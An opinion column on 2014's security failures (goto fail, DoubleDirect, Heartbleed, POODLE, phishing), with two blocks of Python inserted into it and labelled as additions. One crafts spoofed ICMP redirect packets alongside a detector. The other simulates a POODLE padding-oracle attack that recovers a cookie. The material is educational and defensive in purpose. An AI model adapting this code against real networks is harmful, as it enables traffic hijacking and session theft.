2014: the year that security broke
Davey Winder takes a look back at how insecure we all were in 2014...
OPINION: Let me be very clear about this from the get-go: 2014 has been a disastrous year for IT security. Ironically, while the Edward Snowden revelations the year before were bad enough, at least they led to a sea change in the way that businesses and the public alike viewed the privacy of their data. They also prompted big technology players like Apple and Google to do something about it by bringing device encryption to the fore. This latter development is the only real positive I can pluck from the insecure mess that was 2014.
So, let's start with Apple. OS X and iOS users got caught out by man-in-the-middle attacks, twice. Back in February it was discovered that Apple's own SSL/TLS code skipped the signature check on the server's key-exchange message thanks to a duplicated "goto fail" line, so anyone on the network path could pose as any HTTPS site while users assumed their connections were secure. That flaw got patched, but then in November news emerged of the DoubleDirect attack, which uses ICMP redirect messages, sent while spoofing the address of the victim's gateway, to plant an entry in the victim's routing table and steer its traffic through an attacker on the same network, once again leaving iOS and OS X users open to interception.
This time, though, Android users were also in the firing line. Android is generally accepted as being more insecure than iOS (it's OK, I am wearing my tinfoil hat and hiding in a bunker so should escape relatively unscathed), so there was little surprise that it got caught up in the insecurity tsunami of 2014.
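To make the DoubleDirect mechanism concrete, here is an added illustration that is not from the original article or from the researchers who reported the attack: it builds the ICMP redirect an on-link attacker sends (type 5, code 1, spoofed from the gateway, quoting a datagram the victim supposedly sent) and then runs a simple sensor rule over a constructed packet list to flag redirects that point at anything other than a known router. All addresses, the trusted-gateway set and the quoted TCP stub are constructed for the example.

```python
"""ICMP redirect abuse of the DoubleDirect kind: what the packet looks like and how to spot it."""
import ipaddress
import struct

IPv4 = ipaddress.IPv4Address


def inet_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement checksum; evaluates to 0 over data that already carries a valid one."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def ipv4_header(src: str, dst: str, proto: int, payload_len: int) -> bytes:
    """Minimal 20-byte IPv4 header (no options), TTL 64, with its checksum filled in."""
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + payload_len, 0, 0, 64, proto, 0,
                      IPv4(src).packed, IPv4(dst).packed)
    return hdr[:10] + struct.pack("!H", inet_checksum(hdr)) + hdr[12:]


def icmp_redirect(spoofed_src: str, victim: str, new_gateway: str, original_dst: str) -> bytes:
    """The packet an on-link attacker sends: "victim, to reach original_dst use new_gateway".
    The source is spoofed as the victim's current gateway (hosts honour redirects only from
    their first hop) and, as RFC 792 requires, the body quotes the IP header plus 8 bytes of a
    datagram the victim supposedly sent to original_dst (a constructed, all-zero TCP stub here)."""
    quoted = ipv4_header(victim, original_dst, 6, 8) + bytes(8)
    body = struct.pack("!BBH4s", 5, 1, 0, IPv4(new_gateway).packed) + quoted  # type 5, code 1 = host redirect
    icmp = body[:2] + struct.pack("!H", inet_checksum(body)) + body[4:]
    return ipv4_header(spoofed_src, victim, 1, len(icmp)) + icmp


def parse_redirect(pkt: bytes):
    """Returns (src, dst, new_gateway, original_dst) for a well-formed ICMP redirect, else None."""
    if len(pkt) < 20 or pkt[0] >> 4 != 4:
        return None
    ihl = (pkt[0] & 0x0F) * 4
    if pkt[9] != 1 or len(pkt) < ihl + 28:   # protocol 1 = ICMP; 8-byte ICMP header + 20-byte quoted IP header
        return None
    icmp = pkt[ihl:]
    if icmp[0] != 5 or inet_checksum(icmp) != 0:
        return None
    return (str(IPv4(pkt[12:16])), str(IPv4(pkt[16:20])),
            str(IPv4(icmp[4:8])), str(IPv4(icmp[24:28])))   # quoted header's destination at icmp[8+16:]


def suspicious_redirects(packets, trusted_gateways):
    """Sensor rule: an ICMP redirect steering traffic to a host that is not a known router is
    treated as a route-hijack attempt. On a single-router LAN legitimate redirects should
    essentially never appear, so alerting on every type-5 packet is also a defensible choice."""
    alerts = []
    for pkt in packets:
        parsed = parse_redirect(pkt)
        if parsed and parsed[2] not in trusted_gateways:
            src, victim, new_gw, dst = parsed
            alerts.append(f"{src} told {victim} to route {dst} via {new_gw} (not a trusted gateway)")
    return alerts


# Constructed sample: attacker 192.0.2.66 impersonates gateway 192.0.2.1 to hijack victim
# 192.0.2.10's traffic towards 198.51.100.7; the second packet is a plain ICMP echo for contrast.
SAMPLE = [
    icmp_redirect("192.0.2.1", "192.0.2.10", "192.0.2.66", "198.51.100.7"),
    ipv4_header("192.0.2.10", "192.0.2.1", 1, 8) + b"\x08\x00\xf7\xff\x00\x00\x00\x00",
]

if __name__ == "__main__":
    for line in suspicious_redirects(SAMPLE, {"192.0.2.1"}):
        print(line)
```

The sensor cannot tell a spoofed redirect from a genuine one by its source address, which is exactly why DoubleDirect works; the only robust host-side answer is to refuse redirects altogether (on Linux, net.ipv4.conf.all.accept_redirects=0 and secure_redirects=0), and the network-side answer is to alert on any redirect advertising a gateway you did not configure.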
If the year confirmed mobile as a threat vector on the up, it also proved beyond any reasonable doubt that SSL was not only badly named (a Secure Sockets Layer it no longer was) but pretty much dead in the water. First there was the OpenSSL Heartbleed shocker in April, a missing bounds check in the TLS heartbeat extension that let anyone read up to 64KB of a server's memory per request, private keys and session data included, and which come the end of the year is still a cause for concern.
Then there was the revelation from the Google security folk about SSL 3.0 itself, the so-called POODLE vulnerability, which was just as much of a hammer blow. It is not a cipher bug but a protocol one: in SSL 3.0 the padding of a CBC-mode record is not covered by the MAC and only its final length byte is checked, so an attacker sitting on the connection can swap ciphertext blocks around and, by watching which records the server rejects, recover a session cookie at a cost of roughly 256 requests per byte. Any client that would fall back from TLS to SSL 3.0 after a failed handshake, which mainstream browsers did at the time, could be pushed onto the old protocol simply by breaking its TLS handshakes first. Why so much of a hammer blow? Well, according to Microsoft, more than 40 per cent of global websites still accepted SSL 3.0 connections, and exploiting them takes no malware at all, just a position on the network path, the coffee-shop Wi-Fi scenario. That a protocol from 1996 was one of the biggest threats to IT security in 2014 is enough to make us hang our collective heads in shame. That decades-old threat techniques continued to be successful in system breaches equally so.
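The padding-oracle step is easier to believe when you watch it run, so here is an added simulation that is not code from the original article or from the POODLE researchers. It models the SSL 3.0 record layer (MAC, then padding whose only checked byte is the trailing length byte, then CBC) and an attacker who can only make the victim send requests with chosen padding before and after the secret and observe whether the server accepts each tampered record. Assumptions: a SHA-256-based Feistel network stands in for the block cipher (POODLE does not depend on which cipher CBC wraps), HMAC-SHA1 stands in for the SSL 3.0 MAC, a fresh IV is used per record instead of SSL 3.0's chaining, and the four-byte cookie, keys and randomness are constructed and seeded so the run is reproducible.

```python
"""POODLE in miniature: recovering a cookie through SSL 3.0's padding oracle (simulation)."""
import hashlib
import hmac
import random

BLOCK = 16           # cipher block size
MAC_LEN = 20         # SSL 3.0 with SHA-1 appends a 20-byte MAC before padding
SECRET = b"s3cr"     # constructed stand-in for the session cookie the attacker is after
_rng = random.Random(2014)   # seeded for reproducibility; a real client uses real randomness


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def _rand(n: int) -> bytes:
    return bytes(_rng.getrandbits(8) for _ in range(n))


# Block cipher stand-in: a 4-round Feistel network keyed via SHA-256 (assumption: POODLE does
# not care which block cipher CBC wraps, so this avoids depending on an AES library).
def _f(key: bytes, half: bytes, rnd: int) -> bytes:
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[: BLOCK // 2]


def block_encrypt(key: bytes, block: bytes) -> bytes:
    left, right = block[: BLOCK // 2], block[BLOCK // 2 :]
    for i in range(4):
        left, right = right, _xor(left, _f(key, right, i))
    return left + right


def block_decrypt(key: bytes, block: bytes) -> bytes:
    left, right = block[: BLOCK // 2], block[BLOCK // 2 :]
    for i in reversed(range(4)):
        left, right = _xor(right, _f(key, left, i)), left
    return left + right


def ssl3_encrypt(key: bytes, mac_key: bytes, msg: bytes) -> bytes:
    """SSL 3.0 record: MAC, then pad, then CBC-encrypt; returns IV || ciphertext. The padding is
    k arbitrary bytes followed by a length byte k, and nothing but that last byte is ever checked."""
    data = msg + hmac.new(mac_key, msg, hashlib.sha1).digest()
    k = BLOCK - 1 - len(data) % BLOCK
    data += _rand(k) + bytes([k])
    prev = iv = _rand(BLOCK)     # simplification: fresh IV per record instead of chaining
    out = b""
    for i in range(0, len(data), BLOCK):
        prev = block_encrypt(key, _xor(data[i : i + BLOCK], prev))
        out += prev
    return iv + out


def ssl3_accepts(key: bytes, mac_key: bytes, record: bytes) -> bool:
    """Server side: CBC-decrypt, strip the padding by its length byte alone, verify the MAC."""
    blocks = [record[i : i + BLOCK] for i in range(0, len(record), BLOCK)]
    plain = b"".join(_xor(block_decrypt(key, blocks[i]), blocks[i - 1]) for i in range(1, len(blocks)))
    k = plain[-1]
    if k >= BLOCK:
        return False
    data = plain[: len(plain) - k - 1]
    expected = hmac.new(mac_key, data[:-MAC_LEN], hashlib.sha1).digest()
    return hmac.compare_digest(data[-MAC_LEN:], expected)


def poodle_recover(send, accepts, secret_len, max_tries=100_000):
    """Attacker side. send(p, q) makes the victim's browser issue a request whose plaintext is
    p attacker-chosen bytes || secret || q attacker-chosen bytes (a cross-origin POST with a
    chosen path length and body does this); accepts(record) is the server's verdict as seen on
    the wire. No key and no plaintext are needed."""
    recovered = bytearray()
    for k in range(secret_len):
        p = (BLOCK - 1 - k) % BLOCK                  # secret[k] becomes the last byte of a block
        q = -(p + secret_len + MAC_LEN) % BLOCK      # msg+MAC fill whole blocks, so the final block is all padding
        target = (p + k) // BLOCK                    # index of the plaintext block holding secret[k]
        for _ in range(max_tries):
            rec = send(p, q)
            blocks = [rec[i : i + BLOCK] for i in range(0, len(rec), BLOCK)]   # blocks[0] is the IV
            c_i = blocks[target + 1]
            tampered = b"".join(blocks[:-1]) + c_i   # replace the all-padding last block with C_i
            if accepts(tampered):
                # Accepted only if D(C_i)[15] xor (preceding block)[15] == 15; the real P_i[15]
                # is D(C_i)[15] xor C_{i-1}[15], so one more XOR yields the secret byte.
                recovered.append((BLOCK - 1) ^ blocks[-2][-1] ^ blocks[target][-1])
                break
        else:
            raise RuntimeError("oracle never accepted; check the block alignment")
    return bytes(recovered)


KEY, MAC_KEY = _rand(16), _rand(20)


def victim_send(p: int, q: int) -> bytes:
    return ssl3_encrypt(KEY, MAC_KEY, b"A" * p + SECRET + b"B" * q)


def server_accepts(record: bytes) -> bool:
    return ssl3_accepts(KEY, MAC_KEY, record)


if __name__ == "__main__":
    print(poodle_recover(victim_send, server_accepts, len(SECRET)))
```

Each accepted record leaks exactly one byte, and each attempt succeeds with probability 1/256 because the victim re-encrypts under fresh chaining state every time. TLS 1.0 and later are immune to this particular trick because their padding bytes all carry the padding length and are all checked; the remedy in 2014 was therefore to disable SSL 3.0 on both ends and to stop clients from silently falling back to it.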
There's no denying that the bad guys, be they criminal enterprises or state-sponsored teams, continue to become more sophisticated in terms of the malware they write; the simple fact is that they also continue to have great success with the oldest of confidence-trick methodologies.
Call it social engineering, phishing or an advanced persistent threat; the semantics are irrelevant. Scamming your way into the network remains the preferred route of entry for the cyber-crims. Individuals, small businesses and the largest enterprises alike have fallen victim to such techniques. Unfortunately, many businesses also discovered the hard way that another route to their data runs through their business partners: a supplier with remote access to your systems is inside your trust boundary whether or not it is inside your security programme. Hey, why bother attacking what appears to be a secure enterprise when you can attack an insecure one that it trusts? It worked in many of the major retail breaches that were disclosed across the year.